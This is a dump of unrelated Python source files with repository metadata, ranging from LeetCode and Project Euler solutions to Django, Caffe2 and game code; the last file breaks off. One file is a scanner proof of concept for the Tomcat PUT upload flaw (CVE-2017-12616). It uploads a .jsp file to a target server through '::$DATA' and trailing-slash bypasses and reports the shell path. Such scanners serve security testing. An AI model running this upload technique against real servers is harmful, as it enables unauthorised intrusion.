/.metadata/.plugins/org.eclipse.core.resources/.history/9a/f0d15008ccf800161174a93fd5908e78
|
96f863b8b89de32901e8cf640c731bc4ebefeb38
|
[] |
no_license
|
abigdream84/PythonStudy
|
0fc7a3b6b4a03a293b850d0ed12d5472483c4fb1
|
059274d3ba6f34b62ff111cda3fb263bd6ca8bcb
|
refs/heads/master
| 2021-01-13T04:42:04.306730 | 2017-03-03T14:54:16 | 2017-03-03T14:54:16 | 79,123,274 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 983 |
#!/usr/bin/env python
#coding:UTF-8
from audit_demo.utility.MySqlHelper import MySqlHelper
class g_table(object):
def __init__(self):
self.__helper = MySqlHelper()
def add_grp(self,gpname):
sql = 'insert into g_table(g_name) values(%s)'
try:
self.__helper.insert(sql,gpname)
return True
except Exception as e:
print(e)
return False
def get_grp(self,gpname):
sql = 'select g_name from g_table where g_name = %s'
try:
g_id = self.__helper.select(sql,gpname)
except Exception as e:
print(e)
return g_id
def upd_grp(self,g_name_old,g_name_new):
sql = 'update g_table set g_name = %s where g_name = %s'
params = (g_name_new, g_name_old)
try:
self.__helper.update(sql,params)
except Exception as e:
print(e)
t=g_table()
t.add_grp('gp1')
|
[
"[email protected]"
] | ||
d78e9b91414cf74ab0da36fd5f6de8f911a9e0cd
|
53eee7eb899cb518983008532257037fb89def13
|
/2579.count-total-number-of-colored-cells.py
|
eb2d7d5de90aeac6f2c95bbec4eef4b247461260
|
[] |
no_license
|
chenxu0602/LeetCode
|
0deb3041a66cb15e12ed4585bbe0fefce5dc6b26
|
3dc5af2bc870fcc8f2142130fcd2b7cab8733151
|
refs/heads/master
| 2023-07-05T19:26:21.608123 | 2023-07-02T08:35:35 | 2023-07-02T08:35:35 | 233,351,978 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 273 |
py
|
#
# @lc app=leetcode id=2579 lang=python3
#
# [2579] Count Total Number of Colored Cells
#
# @lc code=start
class Solution:
def coloredCells(self, n: int) -> int:
# return n * n + (n - 1) * (n - 1)
return 2 * n * (n - 1) + 1
# @lc code=end
|
[
"[email protected]"
] | |
3c74be0064501659bed8cf392ce9d5f5ca0414a4
|
bede337b5ee193bb5669c855b70a78d929dc5ae8
|
/apps/one_password.py
|
ca9110f9a15ed7b774c7eb7f446788b5cfa0d019
|
[
"0BSD"
] |
permissive
|
dwiel/talon-user
|
ffe83c05e054626431fe12c14dbfe850950fa4c4
|
559617135408ea2ceafaef54564438405546f255
|
refs/heads/master
| 2020-09-12T22:58:36.575833 | 2019-11-19T17:12:05 | 2019-11-19T17:12:05 | 222,585,938 | 0 | 0 |
NOASSERTION
| 2019-11-19T02:00:20 | 2019-11-19T02:00:19 | null |
UTF-8
|
Python
| false | false | 217 |
py
|
from talon import ctrl
from talon.voice import Context, Key
from ..utils import text, delay
ctx = Context("1password")
ctx.keymap({
"password [<dgndictation>] [over]": [Key("shift-cmd-\\"), delay(0.2), text],
})
|
[
"[email protected]"
] | |
050f2631f6b47527fb3ebdc876e7b392d2199011
|
3ffb51fa2241cba9c9680ab01f8da4057861f849
|
/collezione/migrations/0023_auto_20181102_1526.py
|
a6e5117963a13b170e60c828a4b8d205856cf3f5
|
[] |
no_license
|
mions1/Euros
|
a663d9e3a38de56c51091233e6b4fc6db3147fb2
|
faa74139e178b2c9dc868a536518715bed91c676
|
refs/heads/master
| 2020-04-08T00:12:45.713416 | 2018-11-23T14:35:45 | 2018-11-23T14:35:45 | 158,842,175 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 755 |
py
|
# Generated by Django 2.1.2 on 2018-11-02 15:26
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('collezione', '0022_auto_20181030_2030'),
]
operations = [
migrations.AddField(
model_name='acquisto',
name='prezzo',
field=models.FloatField(default=0.0),
),
migrations.AlterField(
model_name='acquisto',
name='data',
field=models.DateField(default=django.utils.timezone.now),
),
migrations.AlterField(
model_name='possiede',
name='prezzo',
field=models.FloatField(default=0.0, null=True),
),
]
|
[
"[email protected]"
] | |
e5fb1f72e9850b7e778c6e302a06e49f892d630d
|
6c219c027c7d0ef454bdeac196bd773e8b95d602
|
/system/tomcat/tomcat_put_exec.py
|
5d95b87eb442bce192ffbb30043ed14ef2a86d4f
|
[] |
no_license
|
aStrowxyu/pocscan
|
663f3a3458140e1bce7b4dc3702c6014a4c9ac92
|
08c7e7454c6b7c601bc54c21172c4788312603b1
|
refs/heads/master
| 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,561 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Tomcat代码执行漏洞(CVE-2017-12616)
referer: https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw
author: Lucifer
description: 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
影响版本:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)。
'''
import sys
import time
import hashlib
import requests
import datetime
import warnings
from termcolor import cprint
class tomcat_put_exec_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
post_data = "thisisashell"
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
vulnurl = self.url + "/" + md5_str +".jsp::$DATA"
try:
req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.status_code == 201:
cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
else:
cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
vulnurl = self.url + "/" + md5_str +".jsp/"
try:
req = requests.put(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
if req.status_code == 201:
cprint("[+]存在Tomcat代码执行漏洞...(高危)\tpayload: "+vulnurl+"\tshellpath: "+self.url+"/"+md5_str+".jsp", "red")
else:
cprint("[-]不存在tomcat_put_exec漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = tomcat_put_exec_BaseVerify(sys.argv[1])
testVuln.run()
|
[
"[email protected]"
] | |
e06edc9ef4206d01ba268cd77e82b51af3988588
|
00f3468d8917ac0c1b4df8b4dc50e82c0d9be3fa
|
/seqsfromfasta.py
|
f7aa0be287db92eee1959c13a03c700c3416c9e7
|
[] |
no_license
|
berkeleyphylogenomics/BPG_utilities
|
4e332bb401b8c057502a1a0a1d532396bfff9542
|
bbf5df137a0a459598c3f9073d80f0086e5f7550
|
refs/heads/master
| 2021-01-01T19:21:13.740575 | 2014-11-05T18:40:31 | 2014-11-05T18:40:31 | 24,867,074 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 572 |
py
|
#!/usr/bin/env python
from Bio import SeqIO
def seqpull(h, *args): #should use 'any' in py > 2.3
return ''.join([seq.format('fasta') for seq in SeqIO.parse(h,'fasta') \
if sum([seq.id.count(arg) for arg in args])])
if __name__ == '__main__':
import sys
if len(sys.argv) < 3:
print "%s: get sequences from a fasta file by substring in defline" \
% sys.argv[0]
print "USAGE: %s <multiple fasta file> [keywords]" % sys.argv[0]
else:
h = open(sys.argv[1])
print seqpull(h,*sys.argv[2:])
h.close()
|
[
"[email protected]"
] | |
0de765120183e963c96ef35cf7a5098d79f772b4
|
21e5825959a886787a3915ff0d3efa86d9cd3702
|
/combat/finishers/impale.py
|
7b32166eb2c800a2409971f38f6bb0c6ea4ef7f5
|
[
"MIT"
] |
permissive
|
ChrisLR/Python-Roguelike-Template
|
e0df37752907377e606197f2469fda61202129d5
|
9b63742b0111c7e9456fb98a96a3cd28d41a1e10
|
refs/heads/master
| 2021-06-26T07:48:39.215338 | 2017-09-14T21:46:08 | 2017-09-14T21:46:08 | 69,761,175 | 0 | 0 | null | 2017-09-14T21:46:09 | 2016-10-01T20:09:24 |
Python
|
UTF-8
|
Python
| false | false | 2,188 |
py
|
from combat.enums import DamageType
from combat.finishers.base import Finisher
from echo import functions
from util import gridhelpers
class Impale(Finisher):
name = "Impale"
description = "Impale your enemy with a slashing or piercing weapon."
attacker_message = "You impale {defender}'s {defender_bodypart} with your {attacker_weapon}"
observer_message = "{attacker} impales {defender} {defender_bodypart} with {attacker_his} {attacker_weapon}"
@classmethod
def evaluate(cls, attack_result):
if attack_result.context.distance_to <= 1:
attacker_weapon = attack_result.context.attacker_weapon
if attacker_weapon and hasattr(attacker_weapon, 'weapon'):
weapon_component = attacker_weapon.weapon
if weapon_component:
if weapon_component.melee_damage_type in (DamageType.Pierce, DamageType.Slash):
return True
return False
@classmethod
def execute(cls, attack_result):
return cls.get_message(attack_result)
@classmethod
def get_message(cls, attack_result):
attacker = attack_result.context.attacker
defender = attack_result.context.defender
attacker_weapon = attack_result.context.attacker_weapon
if attacker.is_player:
message = cls.attacker_message.format(
defender=defender.name,
defender_bodypart=attack_result.body_part_hit.name,
attacker_weapon=attacker_weapon.name,
)
else:
message = cls.observer_message.format(
attacker=functions.get_name_or_string(attacker),
defender=functions.names_or_your(defender),
defender_bodypart=attack_result.body_part_hit.name,
attacker_his=functions.his_her_it(attacker),
attacker_weapon=attacker_weapon.name
)
if defender.body.blood:
message += " splashing {blood} behind {defender_him}!!\n".format(
blood=defender.body.blood.name,
defender_him=functions.him_her_it(defender)
)
return message
|
[
"[email protected]"
] | |
106b49f1d09d2c07ec615d4ff6eada48156bac0f
|
ed3c924c42baa3ab825a482efc15f85a32c06eaa
|
/boj16649.py
|
471eee9a27c32f61b4009e52d88b52912bb2b19c
|
[] |
no_license
|
JoinNova/baekjoon
|
95e94a7ccae51103925e515d765ebda7b6fffeed
|
33b900696ecf2a42b8e452fdeae6ee482143e37e
|
refs/heads/master
| 2020-04-16T22:25:31.577968 | 2019-04-28T04:25:24 | 2019-04-28T04:25:24 | 165,966,949 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 469 |
py
|
#boj16649 Building a Stair
def stair(cube):
cnt=cube
row=(cube+1)//2
print(row+1)
pic='.'*(row+1)+'\n'
for i in range(row):
for j in range(row):
if j==0 or i==row-1:
pic+='o';cnt-=1
elif cube%2==0 and i==row-2 and j==1:
pic+='o';cnt-=1;
else:
pic+='.'
pic+='.\n'
print(pic.strip())
#print(cnt)
n=int(input())
if n==2:print(-1)
else:stair(n)
|
[
"[email protected]"
] | |
65e9e8ebbf9a9682f5fb9acfd790fad23e123824
|
99e44f844d78de330391f2b17bbf2e293bf24b1b
|
/pytorch/caffe2/quantization/server/group_norm_dnnlowp_op_test.py
|
b6acc900437ce89c4bd5c4ea17a400c9b8d47839
|
[
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] |
permissive
|
raghavnauhria/whatmt
|
be10d57bcd6134dd5714d0c4058abd56a1b35a13
|
c20483a437c82936cb0fb8080925e37b9c4bba87
|
refs/heads/master
| 2022-12-04T05:39:24.601698 | 2019-07-22T09:43:30 | 2019-07-22T09:43:30 | 193,026,689 | 0 | 1 |
MIT
| 2022-11-28T17:50:19 | 2019-06-21T03:48:20 |
C++
|
UTF-8
|
Python
| false | false | 4,517 |
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import collections
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
from caffe2.python import core, dyndep, utils, workspace
from caffe2.quantization.server import utils as dnnlowp_utils
from dnnlowp_test_utils import check_quantized_results_close
from hypothesis import given
dyndep.InitOpsLibrary("//caffe2/caffe2/quantization/server:dnnlowp_ops")
workspace.GlobalInit(["caffe2", "--caffe2_omp_num_threads=11"])
class DNNLowPOpGroupNormTest(hu.HypothesisTestCase):
@given(
N=st.integers(1, 4),
G=st.integers(2, 4),
K=st.integers(2, 12),
H=st.integers(4, 16),
W=st.integers(4, 16),
order=st.sampled_from(["NCHW", "NHWC"]),
in_quantized=st.booleans(),
out_quantized=st.booleans(),
weight_quantized=st.booleans(),
**hu.gcs_cpu_only
)
def test_dnnlowp_group_norm(
self,
N,
G,
K,
H,
W,
order,
in_quantized,
out_quantized,
weight_quantized,
gc,
dc,
):
C = G * K
X = np.random.rand(N, C, H, W).astype(np.float32) * 5.0 - 1.0
if order == "NHWC":
X = utils.NCHW2NHWC(X)
gamma = np.random.rand(C).astype(np.float32) * 2.0 - 1.0
beta = np.random.randn(C).astype(np.float32) - 0.5
Output = collections.namedtuple("Output", ["Y", "op_type", "engine"])
outputs = []
op_engine_list = [
("GroupNorm", ""),
("GroupNorm", "DNNLOWP"),
("Int8GroupNorm", "DNNLOWP"),
]
for op_type, engine in op_engine_list:
net = core.Net("test_net")
do_quantize = "DNNLOWP" in engine and in_quantized
do_dequantize = "DNNLOWP" in engine and out_quantized
do_quantize_weight = (
engine == "DNNLOWP" and weight_quantized and len(outputs) > 0
)
if do_quantize:
quantize = core.CreateOperator(
"Quantize", ["X"], ["X_q"], engine=engine, device_option=gc
)
net.Proto().op.extend([quantize])
if do_quantize_weight:
int8_given_tensor_fill, gamma_q_param = dnnlowp_utils.create_int8_given_tensor_fill(
gamma, "gamma_q"
)
net.Proto().op.extend([int8_given_tensor_fill])
X_q_param = dnnlowp_utils.choose_quantization_params(X.min(), X.max())
int8_bias_tensor_fill = dnnlowp_utils.create_int8_bias_tensor_fill(
beta, "beta_q", X_q_param, gamma_q_param
)
net.Proto().op.extend([int8_bias_tensor_fill])
group_norm = core.CreateOperator(
op_type,
[
"X_q" if do_quantize else "X",
"gamma_q" if do_quantize_weight else "gamma",
"beta_q" if do_quantize_weight else "beta",
],
["Y_q" if do_dequantize else "Y"],
dequantize_output=0 if do_dequantize else 1,
group=G,
order=order,
is_test=True,
engine=engine,
device_option=gc,
)
if do_quantize_weight:
# When quantized weight is provided, we can't rescale the
# output dynamically by looking at the range of output of each
# batch, so here we provide the range of output observed from
# fp32 reference implementation
dnnlowp_utils.add_quantization_param_args(group_norm, outputs[0][0])
net.Proto().op.extend([group_norm])
if do_dequantize:
dequantize = core.CreateOperator(
"Dequantize", ["Y_q"], ["Y"], engine=engine, device_option=gc
)
net.Proto().op.extend([dequantize])
self.ws.create_blob("X").feed(X, device_option=gc)
self.ws.create_blob("gamma").feed(gamma, device_option=gc)
self.ws.create_blob("beta").feed(beta, device_option=gc)
self.ws.run(net)
outputs.append(
Output(Y=self.ws.blobs["Y"].fetch(), op_type=op_type, engine=engine)
)
check_quantized_results_close(outputs, atol_scale=2.0)
|
[
"[email protected]"
] | |
2095829a72d1af19ee231c7ec670bf65766c274d
|
fd625e2ea155455c96261c8656a51be22fe420c8
|
/Python/euler035.py
|
4400059a3e93b485f3924881b3fe16cd51c435bb
|
[
"MIT"
] |
permissive
|
AnuragAnalog/project_euler
|
9b84a6aa0061ad4582c8d0059c3c1eaddd844fd2
|
8babbefbd5b7008ad24509f24a9d5f50ba208f45
|
refs/heads/master
| 2021-12-12T12:07:29.338791 | 2021-11-01T04:26:44 | 2021-11-01T04:26:44 | 210,749,964 | 6 | 16 |
MIT
| 2021-11-01T04:26:45 | 2019-09-25T03:44:37 |
Python
|
UTF-8
|
Python
| false | false | 1,240 |
py
|
#!/usr/bin/python3
"""
The number, 197, is called a circular prime because all rotations of the digits: 197, 971, and 719, are themselves prime.
There are thirteen such primes below 100: 2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.
How many circular primes are there below one million?
"""
import numpy as np
def isprime(num: int) -> bool:
for i in range(2, int(np.sqrt(num))+1):
if num%i == 0:
return False
return True
def rotate(num: int) -> set:
rot = {num}
length = len(str(num))
k = 0
while k < length:
tmp = list(str(num))
dig = tmp[0]
tmp[:] = tmp[1:]
tmp.append(dig)
num = ''.join(tmp)
rot.add(int(num))
k = k + 1
return rot
def euler35() -> int:
tot = 0
c_primes = [2]
flag = False
for i in range(3, 10**6, 2):
if isprime(i):
flag = True
tmp = set()
cps = rotate(i)
for x in cps:
if isprime(x):
tmp.add(x)
else:
flag = False
break
if flag:
c_primes.extend(list(tmp))
return len(set(c_primes))
tot = euler35()
print(tot)
|
[
"[email protected]"
] | |
a7114ae73b29642ae1b3b76a8eca40595de9439d
|
df7f13ec34591fe1ce2d9aeebd5fd183e012711a
|
/hata/discord/embed/embed/tests/test__parse_author.py
|
fb71e365acb11fa7c73817ca0ef5c02ff77884b6
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
HuyaneMatsu/hata
|
63e2f6a2d7a7539fd8f18498852d9d3fe5c41d2e
|
53f24fdb38459dc5a4fd04f11bdbfee8295b76a4
|
refs/heads/master
| 2023-08-20T15:58:09.343044 | 2023-08-20T13:09:03 | 2023-08-20T13:09:03 | 163,677,173 | 3 | 3 |
Apache-2.0
| 2019-12-18T03:46:12 | 2018-12-31T14:59:47 |
Python
|
UTF-8
|
Python
| false | false | 481 |
py
|
import vampytest
from ...embed_author import EmbedAuthor
from ..fields import parse_author
def test__parse_author():
"""
Tests whether ``parse_author`` works as intended.
"""
author = EmbedAuthor(name = 'hell')
for input_data, expected_output in (
({}, None),
({'author': None}, None),
({'author': author.to_data()}, author),
):
output = parse_author(input_data)
vampytest.assert_eq(output, expected_output)
|
[
"[email protected]"
] | |
df22c26d03c9eb5404718fa0aee45e5b9bfd5116
|
9b422078f4ae22fe16610f2ebc54b8c7d905ccad
|
/xlsxwriter/test/comparison/test_image01.py
|
81559d51c09a291a0dd6ef1c9b9f4f8d5f70ee88
|
[
"BSD-2-Clause-Views"
] |
permissive
|
projectsmahendra/XlsxWriter
|
73d8c73ea648a911deea63cb46b9069fb4116b60
|
9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45
|
refs/heads/master
| 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 |
NOASSERTION
| 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null |
UTF-8
|
Python
| false | false | 1,149 |
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, [email protected]
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('image01.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with image(s)."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.insert_image('E9', self.image_dir + 'red.png')
workbook.close()
self.assertExcelEqual()
def test_create_file_in_memory(self):
"""Test the creation of a simple XlsxWriter file with image(s)."""
workbook = Workbook(self.got_filename, {'in_memory': True})
worksheet = workbook.add_worksheet()
worksheet.insert_image('E9', self.image_dir + 'red.png')
workbook.close()
self.assertExcelEqual()
|
[
"[email protected]"
] | |
82e5f74cb9e4d564e4c9db40175c77111f664934
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5630113748090880_1/Python/Hichamdz38/b.py
|
ec503006a405070048db8b02218200889a3eaef9
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 309 |
py
|
import numpy as np
for i in xrange(1,input()+1):
N=input()
z=np.array(N**2*2-N)
SS=[]
for j in xrange(N*2-1):
S=map(int,raw_input().split())
SS.extend(S)
f=[]
for j in SS:
if SS.count(j)%2!=0:
if j not in f:
f.append(j)
f.sort()
print "Case #{}:".format(i),
for j in f:
print j,
print
|
[
"[email protected]"
] | |
b9be26523a79e0ed4ebc0819a2cf4003d2b1ee59
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02838/s053367568.py
|
d3c49f223dc225bd9cca1700aa01ef3296ab9707
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,631 |
py
|
# coding: utf-8
import sys
#from operator import itemgetter
sysread = sys.stdin.buffer.readline
read = sys.stdin.buffer.read
#from heapq import heappop, heappush
#from collections import defaultdict
sys.setrecursionlimit(10**7)
#import math
#from itertools import product, accumulate, combinations, product
#import bisect
#import numpy as np
#from copy import deepcopy
#from collections import deque
#from decimal import Decimal
#from numba import jit
INF = 1 << 50
EPS = 1e-8
mod = 10 ** 9 + 7
def mapline(t = int):
return map(t, sysread().split())
def mapread(t = int):
return map(t, read().split())
def generate_inv(n,mod):
"""
逆元行列
n >= 2
Note: mod must bwe a prime number
"""
ret = [0, 1]
for i in range(2,n+1):
next = -ret[mod%i] * (mod // i)
next %= mod
ret.append(next)
return ret
def run():
N, *A = mapread()
maxA = max(A)
L = maxA.bit_length()
subs = [0] * L
for k in range(L):
sum = 0
for a in A:
if (a >> k) & 1:
sum += 1 << k
sum %= mod
subs[k] = sum
sumA = 0
for a in A:
sumA += a
sumA %= mod
ret = 0
ret += (sumA * N) % mod
ret += (sumA * N) % mod
sub_sum = 0
for a in A:
sums = 0
for k in range(L):
if (a >> k) & 1:
sums += subs[k] * 2
sums %= mod
sub_sum += sums
sub_sum %= mod
ret -= sub_sum
ret %= mod
inv = generate_inv(2, mod)
ret *= inv[2]
ret %= mod
print(ret)
if __name__ == "__main__":
run()
|
[
"[email protected]"
] | |
4fd3ad15ddd33c92cdffecb72052595b15ddd601
|
4beabdb5089e3284251dcaf046366c35d3afe02f
|
/rectangles.py
|
06768e5dd0cb13903384183826b1e5920a411701
|
[] |
no_license
|
AndrewFendrich/Mandelbrot
|
c3fa2b1463d6e01b91ac0a3c53ef88c8e1716641
|
074ebd9028c13a9f840c2436ab2c8c3d2275dbf6
|
refs/heads/master
| 2021-01-13T00:52:24.060863 | 2017-05-08T14:30:02 | 2017-05-08T14:30:02 | 50,623,517 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 212 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 27 23:25:48 2015
@author: User
"""
import pygame
pygame.init()
rectangle = pygame.Rect(50,50,100,100)
print(rectangle)
rectangle.inflate_ip(2,2)
print(rectangle)
|
[
"[email protected]"
] | |
80a1c18f8e69671ebde216c7d4f3665ff8b2181b
|
b281dd9e711d737579745914c6611d8cfaddb07d
|
/phones_media_files_demo/phones_media_files_demo/phones/migrations/0001_initial.py
|
c64a49f588e99ab5a1c3d237694ae76464f853d7
|
[
"MIT"
] |
permissive
|
Beshkov/Python-web-fundamentals
|
daf76f3765cb56e02bdaba8ea7df675990dd3885
|
6b0e9cc9725ea80a33c2ebde6e29f2ab585ab8d9
|
refs/heads/main
| 2023-08-03T07:04:22.238320 | 2021-09-12T18:57:36 | 2021-09-12T18:57:36 | 392,644,888 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 633 |
py
|
# Generated by Django 3.2.6 on 2021-08-06 20:25
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Phone',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('manufacturer', models.CharField(max_length=30)),
('model', models.CharField(max_length=15)),
('image', models.ImageField(blank=True, upload_to='phones')),
],
),
]
|
[
"[email protected]"
] | |
54b5f81c202a4a9d48f25271d4ba743e2e4d049f
|
4015e9d9cc72889b3494ae8b58e81dc507ae8d31
|
/venv/Lib/site-packages/celery/bin/beat.py
|
faddd256a6bad3001f11a3074518b1a34db1463b
|
[] |
no_license
|
Unlimit78/Test_For_DevelopsToday
|
675676d3a477f590485722019bc1b1e1412b3926
|
dc4e4ae887edf243adaca3a03c5fd3209ee60300
|
refs/heads/master
| 2022-12-17T18:41:33.511674 | 2020-09-15T18:13:53 | 2020-09-15T18:13:53 | 295,706,782 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,625 |
py
|
# -*- coding: utf-8 -*-
"""The :program:`celery beat` command.
.. program:: celery beat
.. seealso::
See :ref:`preload-options` and :ref:`daemon-options`.
.. cmdoption:: --detach
Detach and run in the background as a daemon.
.. cmdoption:: -s, --schedule
Path to the schedule database. Defaults to `celerybeat-schedule`.
The extension '.db' may be appended to the filename.
Default is {default}.
.. cmdoption:: -S, --scheduler
Scheduler class to use.
Default is :class:`{default}`.
.. cmdoption:: --max-interval
Max seconds to sleep between schedule iterations.
.. cmdoption:: -f, --logfile
Path to log file. If no logfile is specified, `stderr` is used.
.. cmdoption:: -l, --loglevel
Logging level, choose between `DEBUG`, `INFO`, `WARNING`,
`ERROR`, `CRITICAL`, or `FATAL`.
.. cmdoption:: --pidfile
File used to store the process pid. Defaults to `celerybeat.pid`.
The program won't start if this file already exists
and the pid is still alive.
.. cmdoption:: --uid
User id, or user name of the user to run as after detaching.
.. cmdoption:: --gid
Group id, or group name of the main group to change to after
detaching.
.. cmdoption:: --umask
Effective umask (in octal) of the process after detaching. Inherits
the umask of the parent process by default.
.. cmdoption:: --workdir
Optional directory to change to after detaching.
.. cmdoption:: --executable
Executable to use for the detached process.
"""
from __future__ import absolute_import, unicode_literals
from functools import partial
from celery.bin.base import Command, daemon_options
from celery.platforms import detached, maybe_drop_privileges
__all__ = ("beat",)
HELP = __doc__
class beat(Command):
"""Start the beat periodic task scheduler.
Examples:
.. code-block:: console
$ celery beat -l info
$ celery beat -s /var/run/celery/beat-schedule --detach
$ celery beat -S django
The last example requires the :pypi:`django-celery-beat` extension
package found on PyPI.
"""
doc = HELP
enable_config_from_cmdline = True
supports_args = False
def run(
self,
detach=False,
logfile=None,
pidfile=None,
uid=None,
gid=None,
umask=None,
workdir=None,
**kwargs
):
if not detach:
maybe_drop_privileges(uid=uid, gid=gid)
kwargs.pop("app", None)
beat = partial(self.app.Beat, logfile=logfile, pidfile=pidfile, **kwargs)
if detach:
with detached(logfile, pidfile, uid, gid, umask, workdir):
return beat().run()
else:
return beat().run()
def add_arguments(self, parser):
c = self.app.conf
bopts = parser.add_argument_group("Beat Options")
bopts.add_argument("--detach", action="store_true", default=False)
bopts.add_argument("-s", "--schedule", default=c.beat_schedule_filename)
bopts.add_argument("--max-interval", type=float)
bopts.add_argument("-S", "--scheduler", default=c.beat_scheduler)
bopts.add_argument("-l", "--loglevel", default="WARN")
daemon_options(parser, default_pidfile="celerybeat.pid")
user_options = self.app.user_options["beat"]
if user_options:
uopts = parser.add_argument_group("User Options")
self.add_compat_options(uopts, user_options)
def main(app=None):
beat(app=app).execute_from_commandline()
if __name__ == "__main__": # pragma: no cover
main()
|
[
"[email protected]"
] | |
936b7b10e86cdeeaefe0e6f870ba20839b804f3d
|
04a0614b8c2a893dab29bc4ffb0aaf82364fdf3f
|
/53. Maximum Subarray.py
|
2fd8f5e141461dfc091e452ab1ffef6fc179a75e
|
[] |
no_license
|
sharmaji27/Leetcode-Problems
|
716bcb4a36b9e4f45274c4d551967e15c40ddbd2
|
0f878933b17df170c18f0b67b7200cec76c276e0
|
refs/heads/master
| 2021-10-20T17:35:35.175757 | 2021-10-20T05:33:17 | 2021-10-20T05:33:17 | 218,299,755 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 367 |
py
|
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
if len(nums)==1:
print(nums[0])
global_max = nums[0]
current_sum = nums[0]
for i in range(1,len(nums)):
current_sum = max(current_sum+nums[i],nums[i])
global_max = max(current_sum,global_max)
return global_max
|
[
"[email protected]"
] | |
fcfdfb2bf143fbabd9e7882777ff096eaec7745c
|
eeee18e2769766c550fb5e0948977a016b48e15a
|
/Creational/abstract-factory.py
|
72d108161a2fa85440dac2ece3f9d6bf79735986
|
[] |
no_license
|
MoeinGhbh/DesignPattern
|
19aff7bd09f4161d11af2662b1be7962fb692989
|
b543a5c4eaf9da1341f95e9c777310d4f25ddeaf
|
refs/heads/master
| 2022-11-18T17:49:56.101880 | 2020-07-22T07:54:23 | 2020-07-22T07:54:23 | 266,117,271 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,740 |
py
|
"""
Abstract Factory
Car => Benz, Bmw => Suv, Coupe
benz suv => gla, glc
bmw suv => x1, x2
benz coupe => cls, E-class
bmw coupe => m2, m4
"""
from abc import ABC,abstractclassmethod
class Car(ABC):
@abstractclassmethod
def call_suv(self):
pass
@abstractclassmethod
def call_coupe(self):
pass
#---------------------------------------------
class Benz(Car):
def call_suv(self):
return Gla()
def call_coupe(self):
return Cls()
#---------------------------------------------
class Bmw(Car):
def call_suv(self):
return X1()
def call_coupe(self):
return M2()
#---------------------------------------------
